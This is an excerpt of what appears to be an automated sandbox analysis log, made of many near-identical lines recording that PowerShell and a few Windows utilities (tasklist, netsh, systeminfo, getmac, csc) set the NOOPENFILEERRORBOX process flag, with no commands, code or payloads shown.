              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\systeminfo.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\getmac.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
